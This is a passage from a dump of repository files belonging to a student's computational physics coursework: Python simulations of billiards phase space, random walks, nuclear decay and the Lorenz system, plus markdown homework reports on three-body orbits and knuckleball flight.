x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n VX.append(vx)\n t.append(t[-1]+dt)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2 and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2 and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif -a<y[-1]<a and x[-1]>r and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n x[-1]=2*r-x[-1]\n vx=-vx\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]<-r and (x[-1]**2+(y[-1]-a)**2)>RR**2:\n x[-1]=-2*r-x[-1]\n vx=-vx \n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif (x[-1]**2+(y[-1]-a)**2)<=RR**2:\n d=math.sqrt(x[-1]**2+y[-1]**2)\n d1=2*RR-d\n x.append(x[-1]*d1/d)\n y.append(y[-1]*d1/d)\n t.append(t[-1]+dt)\n cs=x[-1]/d\n ss=y[-1]/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n T=t[-1]\n return x,y,VX\n\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,0.2,800)\naa=B[0]\nbb=B[1]\ncc=B[2]\n\nV=[]\nxx=[]\nfor i in range(len(B[1])-1):\n if abs(bb[i])<0.001:\n V.append(cc[i])\n xx.append(aa[i])\n \n \nplt.plot(xx,V,'o', ms=2,color='black')\n\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('r=0.2 in center,phase-space')\n\n \n \n \n \n \n" }, { "alpha_fraction": 0.7149075269699097, "alphanum_fraction": 0.7573449611663818, "avg_line_length": 49.88888931274414, "blob_id": "e33d38c31bc5f32d701354791db94d6b07a3e973", "content_id": "b207b8d4e8d4c1ac7713c111709c74c6f8ed590a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 991, "license_type": "no_license", "max_line_length": 461, "num_lines": 18, "path": "/homework_03.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "----------\n\n> Written with [StackEdit](https://stackedit.io/).\n# Homework_03\n[file_01](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/temp2.py )\n> 自己写的,但很简单只能前后两次移动-_-#\n> 利用while loop,\n> 清屏语句 import os\n> s=os.system(\"clear\")(for Mac)\n> \n\n[file_02]( https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/name.py)\n> 借鉴了[qqyyff](https://github.com/qqyyff)的作业,表示感谢 :-)\n> 使用time module\n\n> **time.sleep(secs)**\n\n> Suspend execution of the calling thread for the given number of seconds. The argument may be a floating point number to indicate a more precise sleep time. The actual suspension time may be less than that requested because any caught signal will terminate the sleep() following execution of that signal’s catching routine. Also, the suspension time may be longer than requested by an arbitrary amount because of the scheduling of other activity in the system.\n\n\n\n" }, { "alpha_fraction": 0.4582456052303314, "alphanum_fraction": 0.5284210443496704, "avg_line_length": 23.465517044067383, "blob_id": "f8875a08241b72250ea01f3e5f90a8c1f69bf930", "content_id": "439c6b1a48f1ab1c22e49b4f8c9e68437f053bcd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1435, "license_type": "no_license", "max_line_length": 48, "num_lines": 58, "path": "/final/2-d randomwalk.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\ndef randpath(T):\n x=[0]\n y=[0]\n t=[0]\n r2ave=[0]*T\n for i in range(T):\n ruler=random.randint(1,2)\n if ruler==1:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1) \n else:\n x.append(x[-1]-1)\n y.append(y[-1])\n if ruler==2:\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n y.append(y[-1]+1)\n else:\n y.append(y[-1]-1)\n x.append(x[-1])\n r2ave[i]=r2ave[i]+(x[-1]**2+y[-1]**2) \n return x,y,t,r2ave\nx,y,t,r2ave=randpath(100)\nx1,y1,t1,r2ave1=randpath(100)\nplt.plot(x,y,color='black')\nplt.plot(x1,y1,color='blue')\nplt.xlabel('x')\nplt.ylabel('y')\nplt.title('random walk in 2 dimension')\n#-----------\nr2ave=[0]*100\nfor i in range(5000):\n x1,y1,t1,r2ave1=randpath(100)\n for j in range(len(x1)-1):\n r2ave[j]=r2ave[j]+r2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,r2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<r2>')\nplt.title('random walk in one dimension')\n#plt.text(10,80,'<x2> versus time')\nk,b=np.polyfit(t0,r2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n\n \n" }, { "alpha_fraction": 0.5827686190605164, "alphanum_fraction": 0.6563407778739929, "avg_line_length": 30.303030014038086, "blob_id": "eb1e1da5e9b4c07ba8e7e5e327e805af50c569ad", "content_id": "3220a478d344c7e193310b7dcd96993fd0200083", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1053, "license_type": "no_license", "max_line_length": 92, "num_lines": 33, "path": "/Ch1_1.4.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\nimport matplotlib.pyplot as plt\ntime=[0]\nT=10000\na=10#初始A粒子数\nb=0#初始B粒子数\nA=[a]#the number of nucleus A\nB=[b]#the number of nucleus B\nAnalytic_A=[a]\nAnalytic_B=[b]\ndt=0.1\ntA=1000#time constant for A\ntB=1#time constant for B\ne=2.718281828459\ni=0\nwhile i<=int(T/dt-1):\n#for i in range(int(T/dt)-1):\n num_of_a_at_dt=A[i]-dt*A[i]/tA\n A.append(num_of_a_at_dt)\n num_of_b_at_dt=B[i]+dt*(A[i]/tA-B[i]/tB)\n B.append(num_of_b_at_dt)\n time.append(dt*(i+1))\n Analytic_A.append(a*2.718281828459**(-dt*(i+1)/tA))\n Analytic_B.append(b+a*tB/(tA-tB)*(2.718281828459**(-dt*(i+1)/tA)-2.718**(-dt*(i+1)/tB)))\n i=i+1\nplt.xlabel('Time(s)')\nplt.ylabel('Number of particles')\nplt.title('Radioactive Decay of 2 nucleus')\nline1,= plt.plot(time,A,color='blue',linewidth='3.0',label='A')\nline2,= plt.plot(time,B,color='pink',linewidth='3.0',label='B')\nline3,= plt.plot(time,Analytic_A,color='yellow',linestyle='-.',label='analytic_A')\nline4,= plt.plot(time,Analytic_B,color='red',linestyle='-.',label='analytic_B')\nplt.legend()\nplt.show()" }, { "alpha_fraction": 0.6990927457809448, "alphanum_fraction": 0.7837701439857483, "avg_line_length": 41.10638427734375, "blob_id": "886b10e4069fd5935d0e9617f357663a86dc9b35", "content_id": "be6d6ab4f9c69f650cd4055f12e9edfc449f16c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1984, "license_type": "no_license", "max_line_length": 300, "num_lines": 47, "path": "/ch4/The Three-Body Problem.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "# The Three-Body Problem\n\n2015301020090\n\nProblem 4.16\n\n##Background\n\nIn this section we'll consider one of the simplest three-body problems,the Sun and two planets,Earth&Jupiter.The magnitude of the forces between the planets are given by inverse-square law.We assume that the orbits of the plants are coplanar.Again we use Euler-Cromer method to calculate the motion.\n\nProblem 4.16 require us to carry out a stimulation which consider Earth,Jupiter&the Sun.And take the center of mass as the origin.I don't know how to choose the initial positons of the planets so I just assume that they are all in x-axis and the initial speed directions are parallel to y-axis.\n\n## [Codes](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/ch4.py)\n\n## Results&Analysis\n\n1.When the mass of Jupiter is unchanged.\n\n![1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/1.png)\n\nTwo planets circulate around the sun.The sun is also moving along y-axis.\n\n2.The mass of jupiter increased to 10 times of its true mass.\n\n ![2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/2.png)\n\n3.The mass of jupiter increased to 100 times of its true mass.\n\n![3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/3.png)\n\n4.The mass of jupiter increased to 300 times of its true mass.\n\n![6]( https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/6.png)\n\n\n\n5.The mass of jupiter increased to 1000 times of its true mass.\n\n![4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/4.png)\n\nJupiter drifts apart but Earth still moves around the Sun\n\n## Defect\n\nThe text book suggests us to give the Sun an initial velocity to make the total momentum of the the system exactly zero so that the center of mass will remain fixed.However,here's the result I got.\n\n![5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch4/5.png)\n\n\n\n\n\n" }, { "alpha_fraction": 0.6550976037979126, "alphanum_fraction": 0.7156181931495667, "avg_line_length": 75.83333587646484, "blob_id": "6f907cb8c1eaee306a32362f59122f469f364db6", "content_id": "26d0c2b20691a432ccee29757dd84c2bcf65686e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4626, "license_type": "no_license", "max_line_length": 466, "num_lines": 60, "path": "/Baseball.md", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\n\n\n> Written with [StackEdit](https://stackedit.io/).\n# Chapter_two_section2.3&4\n--------------------\n\n贾雪巍 2015301020090\nproblem2.17 Kunckleball\n\n--------------------------\n## Throwing a Baseball\n-----------------------------------\n\n## Background\nThe basic equations of motion of for a baseball are the same as those of the cannon shell,with a few deflections, and we will again use the Euler method in our stimulations.Here are the changes we made on the model.\n\n**1**.The force on a baseball due to air resistance is given by the same form as cannon shell's.But the drag coeffcient is a function of v,and is depent on the ball conditions.(P33.fig 2.6)At high speeds or when throwing a rough ball the flow become turbulent.We take \n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=\\frac{B_2}{m}=0.0039&plus;\\frac{0.0058}{1&plus;exp[(v-v_d)/\\Delta]}\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?\\frac{B_2}{m}=0.0039&plus;\\frac{0.0058}{1&plus;exp[(v-v_d)/\\Delta]}\" title=\"\\frac{B_2}{m}=0.0039+\\frac{0.0058}{1+exp[(v-v_d)/\\Delta]}\" /></a>\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=v_d=35m/s,\\Delta=5m/s\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?v_d=35m/s,\\Delta=5m/s\" title=\"v_d=35m/s,\\Delta=5m/s\" /></a>\n\n**2**.The v in air resistance is the speed relative to the air. For a ball spinning about an axis perpendicular to the direction of travel,when add the drag force on different sides of the ball,there will be a net force perpendicular to the center of mass velocity called Magnus force.\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=F_M=S_0wv_x\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?F_M=S_0wv_x\" title=\"F_M=S_0wv_x\" /></a>\nfor baseball<a href=\"http://www.codecogs.com/eqnedit.php?wlatex=S_0/m\\approx4.1\\times10^{-4}\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?S_0/m\\approx4.1\\times10^{-4}\" title=\"S_0/m\\approx4.1\\times10^{-4}\" /></a>.w is the angle velocity we assume w is a constant.\n\n**3**. Knuckleball.Baseball is not a total smooth ball.Since the drag force is greater for a smooth ball than for a rough ball,there will be an imbalance on the two sides of the ball,giving a net force in the direction of the rough side.If the ball rotates **slowly** as it moves so that the exposed stitches moves, the force changes direction.For simplicity we will assume that the ball spins about a vertical axis .The force is given approximately by the function\n\n<a href=\"http://www.codecogs.com/eqnedit.php?latex=$$\\frac{F_{lateral}}{mg}=0.5[sin(4\\theta)-0.25sin(8\\theta)&plus;0.08sin(12\\theta)-0.025sin(16\\theta)]$$\" target=\"_blank\"><img src=\"http://latex.codecogs.com/gif.latex?$$\\frac{F_{lateral}}{mg}=0.5[sin(4\\theta)-0.25sin(8\\theta)&plus;0.08sin(12\\theta)-0.025sin(16\\theta)]$$\" title=\"$$\\frac{F_{lateral}}{mg}=0.5[sin(4\\theta)-0.25sin(8\\theta)+0.08sin(12\\theta)-0.025sin(16\\theta)]$$\" /></a>\n\n\n## [Code](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ch3.py)\n--------------------\n\n## Result&Analysis\n---------------------\n1.different center of mass velocity\n(I choose this initial angular orientation and angular velocity because it looks ok,others go crazy......-_-#)\n![FIG1](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball1.png)\n![fig2](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball2.png)\n **When change center of mass velocity,the curve shape doesn't change.**\n **The largest velocity has the longest range.**\n\n---------------------------\n2.different w\n![fig3](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball3.png)\n![fig4](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball4.png)\n**pi/5 has the longest range.\nFrom the x-z figure,I can approximately see how a Knucleball moves.It's hard to say where it lands.**\n\n----------------\n3.different theta\nI abandon the curves with x<0\n![fig5](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball5.png)\n![fig6](https://github.com/jxw666/computationalphysics_N2015301020090/blob/master/ball6.png)\n**1.8pihas the longest range.Still can't tell how this works.It is not consistent with my experience -_-#**\n## Defect\nThe air resistance shouldn't have x<0(??),I think the forces in this model are wrong.\nThe actual the baseball motion may not have a horizontal velocity.Its spin may be more complicated.And the forces in this model are just approximations which can make our calculaton easier. \n## The way to catch a knuckleball is to wait until it stops rolling and pick it up.--Bob Uecker哈哈哈\n" }, { "alpha_fraction": 0.5225316286087036, "alphanum_fraction": 0.6096202731132507, "avg_line_length": 22.780487060546875, "blob_id": "e59a79f65322fa5400ca1f449e867cd2434aa93a", "content_id": "2a1e61f069931fd4a15b22f196a50594b53b4873", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1985, "license_type": "no_license", "max_line_length": 41, "num_lines": 82, "path": "/final/randpath副本.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import random\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef randpath(T):\n x=[0]\n t=[0]\n x2ave=[0]*T\n for i in range(T):\n c=random.random()\n t.append(i+1)\n if c<=0.5:\n x.append(x[-1]+1)\n else:\n x.append(x[-1]-1)\n x2ave[i]=x2ave[i]+x[-1]**2\n return x,t,x2ave\nx,t,x2ave=randpath(100)\nx1,t1,x2ave1=randpath(100)\nfig = plt.figure(figsize=(10, 5))\nplt.plot(t,x,'o',ms=4,color='red')\nplt.plot(t1,x1,'o',ms=4,color='blue')\nplt.xlabel('time(step number)')\nplt.ylabel('X')\nplt.title('random walk in one dimension')\n\n\n#----------\naverage=[0]*101\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)):\n average[j]=average[j]+x1[j]/5000\nplt.figure(figsize=(10,5))\nplt.ylim(-0.5,0.5)\nplt.grid()\nplt.plot(t1,average)\nplt.xlabel('time(step number)')\nplt.ylabel('<x>')\nplt.title('random walk in one dimension')\nplt.text(0,0.15,'<x> versus time')\n#-----------\\\nx2ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x2ave[j]=x2ave[j]+x2ave1[j]/5000\nplt.figure(figsize=(10,5))\nplt.grid()\nt0=[]\nfor i in range(100):\n t0.append(i+1)\nplt.plot(t0,x2ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<x2>')\nplt.title('random walk in one dimension')\nplt.text(10,80,'<x2> versus time')\nk,b=np.polyfit(t0,x2ave,1)#多项式拟合\nideal=[]\nfor i in range(100):\n ideal.append(k*(i+1)+b)\nplt.plot(t0,ideal,color='red')\nprint(k,b)\n#------\nx4ave=[0]*100\nfor i in range(5000):\n x1,t1,x2ave1=randpath(100)\n for j in range(len(x1)-1):\n x4ave[j]=x4ave[j]+x1[j+1]**4/5000\n\nplt.figure(figsize=(10,5))\nplt.grid()\nplt.plot(t0,x4ave,'o',ms=3)\nplt.xlabel('time(step number)')\nplt.ylabel('<x4>')\nplt.title('random walk in one dimension')\na,b,c=np.polyfit(t0,x4ave,2)\nideal4=[]\nfor i in range(100):\n ideal4.append(a*i**2+b*i+c)\nplt.plot(t0,ideal4,color='red')\nplt.text(20,20000,'<x4>versus time')\nprint(a,b,c)\n \n \n \n\n\n \n\n\n\n" }, { "alpha_fraction": 0.39566299319267273, "alphanum_fraction": 0.4653394818305969, "avg_line_length": 20.96875, "blob_id": "555b10b85d47c65c4d77e270344ffc3ca82b7868", "content_id": "1b0a5518734e5ed77fb57c775c3ef2297d15dd68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2813, "license_type": "no_license", "max_line_length": 56, "num_lines": 128, "path": "/homework8/code/phasespacebliiard.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\nimport numpy as np\ndef billiard(x0,y0,vx0,vy0,r,a,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n VX=[vx]\n t=[0]\n dt=0.01\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n VX.append(vx)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n d2=math.sqrt(vx**2+vy**2)\n d1=2*r-d\n \n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]>r:\n x[-1]=2*r-x[-1]\n x.append(x[-1])\n y.append(y[-1])\n vx=-vx\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]<-r:\n x[-1]=-2*r-x[-1]\n vx=-vx \n x.append(x[-1])\n y.append(y[-1])\n VX.append(vx)\n T=t[-1]\n return x,y,VX\n\nfig = plt.figure(figsize=(11, 11))\n\nB=billiard(0.5,0.5,-0.4,-0.3,1,0,800)\na=B[0]\nb=B[1]\nc=B[2]\nV=[]\nxx=[]\nA=billiard(0.5,0.5,-0.4,-0.3,1,0.01,800)\naa=A[0]\nbb=A[1]\ncc=A[2]\nVV=[]\nxxx=[]\nC=billiard(0.5,0.5,-0.4,-0.3,1,0.1,800)\naaa=C[0]\nbbb=C[1]\nccc=C[2]\nVVV=[]\nxxxx=[]\nD=billiard(0.5,0.5,-0.4,-0.3,1,1,800)\naaaa=C[0]\nbbbb=C[1]\ncccc=C[2]\nVVVV=[]\nxxxxx=[]\nplt.subplot(2,2,1)\nplt.xlim(-1,1)\n\nfor i in range(len(B[1])-1):\n if abs(b[i])<0.001:\n V.append(c[i])\n xx.append(a[i])\nplt.plot(xx,V,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=0')\nplt.subplot(2,2,2)\nplt.xlim(-1,1)\n\nfor i in range(len(A[1])-1):\n if abs(bb[i])<0.001:\n VV.append(cc[i])\n xxx.append(aa[i])\nplt.plot(xxx,VV,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=0.01')\nplt.subplot(2,2,3)\nplt.xlim(-1,1)\n\nfor i in range(len(C[1])-1):\n if abs(bbb[i])<0.001:\n VVV.append(ccc[i])\n xxxx.append(aaa[i])\nplt.plot(xxxx,VVV,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=0.1')\nplt.subplot(2,2,4)\nplt.xlim(-1,1)\n\nfor i in range(len(D[1])-1):\n if abs(bbbb[i])<0.001:\n VVVV.append(cccc[i])\n xxxxx.append(aaaa[i])\nplt.plot(xxxx,VVV,'o', ms=2,color='black')\nplt.xlabel('x')\nplt.ylabel('vx')\nplt.title('alpha=1')\n\n" }, { "alpha_fraction": 0.46488550305366516, "alphanum_fraction": 0.5022900700569153, "avg_line_length": 16.399999618530273, "blob_id": "ee05983fd4a38a7618e8d00d36b1165ec6bb9305", "content_id": "2c3e320e31b2f1e32691949828c5c9b350e5e8b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1310, "license_type": "no_license", "max_line_length": 47, "num_lines": 75, "path": "/Ch3/lorenz poin.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef lorenz(r,sigma,b):\n x=[0]\n y=[1]\n z=[1]\n t=[0]\n i=0\n t_i=0\n dt=0.01\n while t_i<=50:\n x_i=x[i]\n y_i=y[i]\n z_i=z[i]\n t_i=t[i]\n x_dt=x_i+sigma*(y_i-x_i)*dt\n y_dt=y_i-(x_i*z_i-r*x_i+y_i)*dt\n z_dt=z_i+(x_i*y_i-b*z_i)*dt\n T=t_i+dt\n x.append(x_dt)\n y.append(y_dt)\n z.append(z_dt)\n t.append(T)\n i=i+1\n return x,y,z,t\nL=lorenz(25,10,8/3)\n\n\n\n\n#fig=plt.figure()\n#ax = fig.gca(projection='3d')\nX=np.array(L[0])\nY=np.array(L[1])\nZ=np.array(L[2])\nT=np.array(L[3])\n\n\n \n#ax.plot(X,Y,Z,color='black')\nplt.subplot(121)\npoin_z=[]\npoin_x=[]\npoin_y=[]\nfor i in range(len(X)-1):\n if X[i]*X[i+1]<=0:\n poin_z.append(Z[i])\n poin_y.append(Y[i])\n \nplt.plot(np.array(poin_y),np.array(poin_z),'o')\nplt.xlabel('y')\nplt.ylabel('z')\nplt.title('z versus y when x=0') \n\nplt.subplot(122)\np_z=[]\np_x=[]\np_y=[]\nfor i in range(len(X)-1):\n if Y[i]*Y[i+1]<=0:\n p_z.append(Z[i])\n p_x.append(X[i]) \nplt.plot(np.array(p_x),np.array(p_z),'o')\nplt.xlabel('x')\nplt.ylabel('z')\nplt.title('x versus z when y=0') \n\n#for angle in range(0, 360):\n#ax.view_init(30, 0)\n#plt.draw()\n #plt.pause(.001)\n#plt.plot(L[0],L[2])\nplt.show()\n " }, { "alpha_fraction": 0.5068399310112, "alphanum_fraction": 0.5896033048629761, "avg_line_length": 20.441177368164062, "blob_id": "4bc5cc22e3c64f4bf466ab06d39e9aee29cd4633", "content_id": "93e8cd04a2ae7f041e15ae93e0c5e4f9263b97c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1462, "license_type": "no_license", "max_line_length": 43, "num_lines": 68, "path": "/Ch3/lorenz.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import matplotlib as mpl\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef lorenz(r,sigma,b,TIME):\n x=[1]\n y=[0]\n z=[0]\n t=[0]\n i=0\n t_i=0\n dt=0.01\n while t_i<=TIME:\n x_i=x[i]\n y_i=y[i]\n z_i=z[i]\n t_i=t[i]\n x_dt=x_i+sigma*(y_i-x_i)*dt\n y_dt=y_i-(x_i*z_i-r*x_i+y_i)*dt\n z_dt=z_i+(x_i*y_i-b*z_i)*dt\n T=t_i+dt\n x.append(x_dt)\n y.append(y_dt)\n z.append(z_dt)\n t.append(T)\n i=i+1\n return x,y,z,t\nL1=lorenz(100,10,8/3,50)\nL2=lorenz(100,10,8/3,50)\nfig = plt.figure(figsize=(15, 4))\n#ax = fig.gca(projection='3d')\nax1 = fig.add_subplot(131, projection='3d')\nax2 = fig.add_subplot(132, projection='3d')\n\nax3 = fig.add_subplot(133, projection='3d')\n#ax.view_init(90, 0)\n#ax.set_xlabel(\"X label\")\n#ax.set_ylabel(\"Y label\")\n#ax.set_zlabel(\"Z label\")\nX1=np.array(L1[0])\nY1=np.array(L1[1])\nZ1=np.array(L1[2])\n#T=np.array(L1[3])\nX2=np.array(L2[0])\nY2=np.array(L2[1])\nZ2=np.array(L2[2])\nax1.plot(X1,Y1,Z1,color='black')\nax1.set_title('r=100')\nax1.set_xlabel('x')\nax1.set_ylabel('y')\nax1.set_zlabel('z')\nax1.view_init(30,0)\nax2.plot(X2,Y2,Z2,color='black')\nax2.set_title('r=100')\nax2.set_xlabel('x')\nax2.set_ylabel('y')\nax2.set_zlabel(\"z\")\nax1.view_init(30,180)\n\nax3.plot(X2,Y2,Z2,color='black')\nax3.set_title('r=100')\nax3.set_xlabel('x')\nax3.set_ylabel('y')\nax3.set_zlabel(\"z\")\nax3.view_init(90,0)\nplt.show()\n " }, { "alpha_fraction": 0.30363160371780396, "alphanum_fraction": 0.37401720881462097, "avg_line_length": 26.340206146240234, "blob_id": "e1566979ec964e366defb7026cf6d5dba3a1a4d7", "content_id": "fcf9d66d3c47a1489bbfdd1b0a42aa9659a1187b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2671, "license_type": "no_license", "max_line_length": 98, "num_lines": 97, "path": "/homework8/code/phasespace3.py", "repo_name": "jxw666/computationalphysics_N2015301020090", "src_encoding": "UTF-8", "text": "import math\nimport matplotlib.pyplot as plt\ndef billiard(x0,y0,vx0,vy0,r,a,X,Y, RR,time):\n x=[x0]\n y=[y0]\n vx=vx0\n vy=vy0\n VX=[vx]\n t=[0]\n dt=0.001\n T=0\n while T<=time:\n x.append(x[-1]+vx*dt)\n y.append(y[-1]+vy*dt)\n t.append(t[-1]+dt)\n VX.append(vx)\n if y[-1]>=a and (x[-1]**2+(y[-1]-a)**2)>r**2 and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]-a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]-a)*d1/d+a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]-a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif y[-1]<=-a and (x[-1]**2+(y[-1]+a)**2)>r**2 and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n d=math.sqrt(x[-1]**2+(y[-1]+a)**2)\n d1=2*r-d\n x.append(x[-1]*d1/d)\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n cs=x[-1]/d\n ss=(y[-1]+a)/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n elif -a<y[-1]<a and x[-1]>r and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n x[-1]=2*r-x[-1]\n vx=-vx\n x.append(x[-1])\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif -a<y[-1]<a and x[-1]<-r and ((x[-1]-X)**2+((y[-1]-a)-Y)**2)>RR**2:\n x[-1]=-2*r-x[-1]\n vx=-vx\n x.append(x[-1])\n y.append((y[-1]+a)*d1/d-a)\n VX.append(vx)\n elif ((x[-1]-X)**2+((y[-1]-a)-Y)**2)<=RR**2:\n d=math.sqrt((x[-1]-X)**2+(y[-1]-Y)**2)\n d1=2*RR-d\n xx=x[-1]*d1/d\n yy=y[-1]*d1/d\n if (x[-1]*d1/d-Y)**2+(y[-1]*d1/d-Y)**2>=RR**2:\n x.append(xx)\n y.append(yy)#t.append(t[-1]+dt)\n cs=x[-1]/d\n ss=y[-1]/d\n vpt=vy*cs-vx*ss\n vpr=-(vy*ss+vx*cs)\n vx=vpr*cs-vpt*ss\n vy=vpr*ss+vpt*cs\n VX.append(vx)\n elif (x[-1]*d1/d-X)**2+(y[-1]*d1/d-Y)**2<RR**2:\n xx=xx*d1/d\n yy=yy*d1/d\n T=t[-1]\n return 